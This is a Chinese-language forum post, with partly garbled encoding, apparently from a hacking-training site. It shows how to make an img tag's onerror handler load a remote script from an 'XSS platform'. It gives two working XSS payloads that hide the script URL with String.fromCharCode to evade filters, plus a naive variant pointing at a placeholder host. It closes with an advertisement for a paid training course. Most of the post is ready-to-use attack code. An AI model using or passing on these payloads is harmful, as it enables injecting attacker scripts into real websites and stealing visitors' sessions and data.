|
|
XSS漏洞如何在標(biāo)簽內(nèi)調(diào)用xss平臺鏈接
<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
今天有學(xué)員問如何在標(biāo)簽內(nèi)調(diào)用XSS平臺鏈接���,問這樣在標(biāo)簽內(nèi)寫上js的網(wǎng)址可以執(zhí)行嗎��?答:不行��,因?yàn)閛nerror內(nèi)聯(lián)事件,寫javascript語法����。
xss.jpg (33.68 KB, 下載次數(shù): 65)
下載附件
保存到相冊
2020-3-6 17:49 上傳
解決辦法:
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">
無引號版payload:
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>
ZP培訓(xùn):http://m.anzei.cn/thread-10128-1-1.html
課程截圖:
zp1.jpg (41.12 KB, 下載次數(shù): 61)
下載附件
保存到相冊
2020-3-6 17:52 上傳
zp2.jpg (38.37 KB, 下載次數(shù): 64)
下載附件
保存到相冊
2020-3-6 17:53 上傳
|
|
發(fā)表于 2020-3-6 17:53:13
收藏
樓主
